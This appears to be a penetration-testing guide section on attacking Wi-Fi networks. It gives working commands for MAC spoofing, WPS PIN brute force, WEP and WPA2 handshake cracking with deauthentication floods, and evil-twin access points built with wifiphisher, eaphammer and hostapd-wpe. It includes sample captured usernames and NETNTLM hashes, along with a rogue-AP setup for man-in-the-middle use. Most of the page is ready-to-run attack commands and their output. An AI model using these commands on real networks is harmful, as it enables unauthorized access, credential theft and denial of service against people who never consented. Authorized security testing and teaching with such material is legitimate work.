WIFI
The WIFI section of the Information gathering phase explained how to discover the company's wireless Access Points and their clients. So, in this section, you will find some methods about how to crack them.
Despite having authentication methods, some networks also have access control lists based on the MAC address of the devices. Nevertheless, this can be bypassed pretty easily by changing the attacker's MAC address by one of the network's stations.
# 1. Option
sudo macchanger -m <XX:XX:XX:XX:XX:XX> <IF>
# 2. Option
sudo ifconfig <IF> down
sudo ifconfig <IF> hw ether <XX:XX:XX:XX:XX:XX>
sudo ifconfig <IF> up
Depending on the authentication mechanisms implemented by the wireless networks, exists different methods to retrieve the password to access the network. However, all these mechanisms require of brute force attacks.
sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf [-K {1|2|3}] -c <CHANNEL>
sudo bully <MON_IF> -b <AP_MAC> -c <CHANNEL> -S -F -B -v 3
K
: Run pixiedust attackvv
: VerboseN
: Do not send NACK messages when out-of-order packets are receivedw
: Mimic a W7 registrarf
: Disable channel hopping
Note: I have not been able on any a single AP to obtain the PIN
If the WPS pin has been found we can ask the AP to provide the WPA key.
sudo reaver -i <MON_IF> -b <AP_MAC> -vvNwf -c <CHANNEL> -p <FOUND_IP>
After detecting the WEP target network, the attacker can use besside-ng (It also works for WPA
-W
) which does the job pretty easily, returning the WEP key in hexadecimal (It can be converted using a HEX to ASCII converter). Nonetheless, you can always use aircrack-ng to obtain the ASCII version aircrack-ng <WEP.PCAP>
.besside-ng -c <CHANNEL> -b <BSSID_MAC> <MON_IF>
Note: The application can crash while attacking the AP; keep trying until obtaining the WEP key.
WPA2 replaced WEP due to its several weaknesses. However, WPA2-PSK still has flaws because the encrypted Pre-Shared Key (PSK) is shared during the process 4-way handshake. Hence, an attacker could sniff those network packets for password cracking in the future.
The attack process is the following:
1. Capture the target's AP traffic.
airodump-ng --bssid <TARGET_BSSID> -c <CHANNEL> --write <OUTPUT_CAP> <MON_I>
2. Deauthenticating a client or the entire network (More changes to obtain a handshake). keep doing this step until you get the "WPA handshake: XXXXX" message on airodump.
# The whole network
aireplay-ng -0 <NUM_DEAUTH_PKTS> -a <TARGET_BSSID> <MON_IF>
# A client
aireplay-ng -0 100 -a <TARGET_BSSID> -c <CLIENT_MAC> <MON_IF>
3. Cracking the password with dictionary attacks can be done with aircrack-ng or hashcat, being the latter faster.
# Aircrack
aircrack-ng -w <WORDLIST> -b <TARGET_BSSID> <FILE_CAP>
#Hashcat
hcxpcapngtool $(find . -name *.cap) -o <HANDSHAKES.txt>
hashcat -m 22000 <HANDSHAKES.TXT> <WORDLIST.TXT>
Note: If you want to perform a brute force attack to crack the password, you can use the following command.
crunch <MIN_LENGTH> <MAX_LENGTH> <CHARACTERS> | aircrack-ng -w - -b <TARGET_BSSID> <FILE_PCAP>
EAP-MD5 is a legacy authentication mechanism that does not provide sufficient protection for user authentication credentials. Users who authenticate using EAP-MD5 subject themselves to an offline dictionary attack vulnerability.
The tool eapmd5pass can be used to retrieve the EAP-MD5 authentication exchange and start a dictionary attack against the user's password.
The WPA-EAP APs require of a user and a password to authenticate against the network. You can use the following tools for wireless networks to brute force some credentials.
Note: These tools are sometimes hard to set up in updated environments and, depending on the authentication protocol, might not work.
Furthermore, another test that could be performed is to try to block user accounts using a user provided by the company and make a lot of failed login attempts.
The wireless phishing attack consists of creating an evil twin AP while performing a deautentication attack against the target AP, to trick the victim into login into our fake AP and obtaining some credentials.
For environments that use WPA/2 with Pre-Shared key authentication, like a house or a small business, several tools can be used to create a fake access point, tricking the victim into providing the key. These tools are:
# The obtained file is: loot/wpa_handshake_capture*.hccapx
sudo ./eaphammer -i <IF> --channel <CHANNEL> --auth wpa-psk --essid <TARGET_ESSID> --ssid <TARGET_BSSID> --creds
After obtaining the handshake needs several transformations before being cracked with HashCat. You need to use hcxhash2cap and hcxpcapngtool from hcxtools to transform the hccapx file into a hash.
./hcxhash2cap --hccapx=<HANDSHAKE.hccapx> -c <OUTPUT.cap>
./hcxpcapngtool <OUTPUT.cap> -o <HASH.TXT>
hashcat -a 0 -m 22000 <HASH.TXT> <WORDLIST.TXT>
- Wifiphisher in a very simple way creates a fake access point with a phishing webpage (it can be changed), inducing the victim to enter the wireless AP key. Furthermore, if a second wireless network interface is provided, it also makes a deautentication attack against the victim AP.
sudo wifiphiser
[...]
[*] POST request from 10.0.0.61 with wfphshr-wpa-password=password1234
In order to obtain some credentials to access the network, you can create fake access points such as evil-twins, making the client connect to your AP and providing the credentials for later use.
For doing this type of attack you can choose between eaphammer or hostpad-wpe, depending on your hacking environment, if you are using WIFI pineapples or a kali machine.
Installation & Configuration
Because the version that is on the Kali Linux repositories has a programming error, you need to download the one from the GitHub repositories.
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
sudo ./kali-setup
# Create the certificate with the data of your victim's certificate in order to be more trusted.
sudo python3 eaphammer --cert-wizard
Attack
To set the rogue access point use the following command and do to forget to deautenticate the original AP.
sudo python3 eaphammer -i <IF> --channel <CHANNEL> --auth wpa-eap --essid <VICTIMS_SSID> --creds
[...]
# Mobile
username: pepe
password: palotes
[...]
# Windows
domain\username: pepe
username: pepe
challenge: c9:fa:47:6b:34:ca:b4:ea
response: 25:44:19:55:4f:a1:9f:b5:68:00:58:67:e3:58:00:ed:6f:0d:3d:6f:b2:7d:63:ab
jtr NETNTLM: pepe:$NETNTLM$c9fa476b34cab4ea$254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab
hashcat NETNTLM: pepe::::254419554fa19fb568005867e35800ed6f0d3d6fb27d63ab:c9fa476b34cab4ea
With hostpad-wpe we can create a fake radius AP where the users can log in to obtain its credentials, that will require a post cracking phase.
For the latest version of the pineapple is more challenging to install, due to there is not available modules on the repositories. So, you will need to execute the following commands.
# Installation
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
wget https://github.com/jekkos/hostapd-wpe-openwrt/releases/download/2/hostapd-wpe_git-2_mips_24kc.ipk
scp hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk [email protected]<PINEAPPLE_IP>:/tmp/
scp hostapd-wpe_git-2_mips_24kc.ipk [email protected]<PINEAPPLE_IP>:/tmp/
opkg install /tmp/hostapd-common_2019-08-08-ca8c2bd2-4_mips_24kc.ipk
opkg install /tmp/hostapd-wpe_git-2_mips_24kc.ipk
opkg update && opkg install coreutils-nohup
# Configuration
# By default it doesn't show the challgenge respose, so we need to add the following lines
echo "eap_server=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id=101112131415161718191a1b1c1d1e1f" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_a_id_info=hostapd-wpe" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "eap_fast_prov=3" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "ieee8021x=1" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_lifetime=604800" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_key_refresh_time=86400" >> /etc/hostapd-wpe/hostapd-wpe.conf
echo "pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f" >> /etc/hostapd-wpe/hostapd-wpe.conf
sed -i 's/^ctrl_interface=\/var\/run\/hostapd$/&-wpe/' /etc/hostapd-wpe/hostapd-wpe.conf
Configuration
Then, we need to modify the
hostapd-wpe.conf
file setting the wireless interface that we are going to use, the name of the ssid that we want to spoof and the channel where this AP emits.sudo vim /etc/hostapd-wpe/hostapd-wpe.conf
[...]
# Interface - Probably wlan0 for 802.11, eth0 for wired
interface=<WIRELESS_IF>
[...]
# 802.11 Options
ssid=<SSID_NAME>
channel=<VICTIM_SSID_CHANNEL>
Attack
After that, we need to deautenticate the victim AP, execute hostapd-wpe and wait for users to log in. For doing so, execute the following commands.
Deautenticate the AP:
aireplay-ng -0 <#PACKETS_TO_SEND> -a <AP_BSSID> <IF>
Execute hostapd-wpe:
sudo hostapd-wpe -i <IF> -k -s /etc/hostapd-wpe/hostapd-wpe.conf
[...]
mschapv2: Thu Jun 9 07:04:16 2022
username: pepito
challenge: 35:0a:18:49:63:83:ee:76
response: fc:65:5a:02:73:9f:89:a5:95:e5:8e:8f:4b:1b:72:0e:9e:d1:04:03:ee:b5:bd:ea
jtr NETNTLM: pepito:$NETNTLM$350a18496383ee76$fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea
hashcat NETNTLM: pepito::::fc655a02739f89a595e58e8f4b1b720e9ed10403eeb5bdea:350a18496383ee76
-k
: Karma Mode (Respond to all probes)-s
: Return Success where possible
Note: The device is never going to be able to connect to the AP and get Internet, automatically it will be disconnected due to wrong credentials. That occurs because our fake radius server does not have the credentials that the victim is providing.
Finally, we need to put every
hashcat NETNTLM
into a file for offline cracking.hashcat -m 5500 <HASHCAT_NETNTLM_FILE> <WORLDIST>
It may be the case that you need an access point with internet access for personal reasons or for man-in-the-middle attacks. Whatever the case, here's how to do it.
Note: The environment is a VM Kali machine, it might not work on other distros or require more steps.
Note 2: Depending on your network card, you might not be able to log in despite the ESSID being broadcasted, try using another.
1. you need to install the following programs.
sudo apt install hostapd-wpe hostapd dnsmasq iptables-persistent -y
2. Modify the file
/etc/dnsmasq.conf
for dnsmasq to obtain a DHCP server.interface=wlan0
listen-address=127.0.0.1
dhcp-range=10.0.0.3,10.0.0.20,255.255.255.0,12h
server=8.8.8.8
server=8.8.4.4
3. Because Kali comes with systemd-resolved you avoid the conflicts with dnsmasq. To do so, change the file
/etc/systemd/resolved.conf
and add the following line.DNSStubListener=no
4. Add a user to login into the AP. For doing so, you need to edit the file
/etc/hostapd-wpe/hostapd-wpe.eap_user
. Here you have some examples:* PEAP,TTLS,TLS,FAST
"test" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "test" [2]
"user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "password" [2]
5. Configure the machine to allow IP forward persistently.
echo net.ipv4.ip_forward=1 | sudo tee -a /etc/sysctl.conf
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
Every time, you restart your virtual machine you will need to set a static IP to your external network card and restart dnsmasq to detect the wlan0 interface with an IP.
sudo ifconfig wlan0 up 10.0.0.1 netmask 255.255.255.0
sudo systemctl restart dnsmasq
Finally, you need to execute hostapd with the configuration file at
/etc/hostapd-wpe/hostapd-wpe.conf
. In there, you can change the channel, ESSID, protocols, etc.sudo hostapd -i wlan0 /etc/hostapd-wpe/hostapd-wpe.conf
Last modified 1mo ago